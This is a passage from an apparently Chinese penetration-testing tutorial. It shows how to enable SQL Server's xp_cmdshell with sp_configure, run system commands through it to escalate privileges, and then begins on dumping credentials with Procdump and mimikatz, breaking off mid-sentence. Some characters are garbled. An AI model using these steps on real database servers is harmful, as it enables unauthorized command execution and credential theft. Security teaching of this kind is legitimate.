此存儲過程在SQLserver2000中默認開啟，2005本身及之后的版本默認禁止，所以想要使用該存儲過程，就需要擁有SA賬號相應(yīng)權(quán)限，使用sp_configure將其開啟。啟用xp_cmdshell:

EXEC sp_configure 'show advanced options', 1RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;執(zhí)行命令：

EXEC master.dbo.xp_cmdshell 'whoami'注：2005的xp_cmdshell的權(quán)限一般是system而2008多數(shù)為ntauth-ority\network service。故xp_cmdshell的提權(quán)前提為兩個：1、拿到sa權(quán)限的賬戶密碼；2、sqlserver服務(wù)未降權(quán)SQL Server提權(quán)詳情請參考：https://blog.csdn.net/u014029795/article/details/116910134
3.Procdump+mimikatz配合抓取密碼Procdump是微軟官方工具，不會被殺軟查殺，其抓取密碼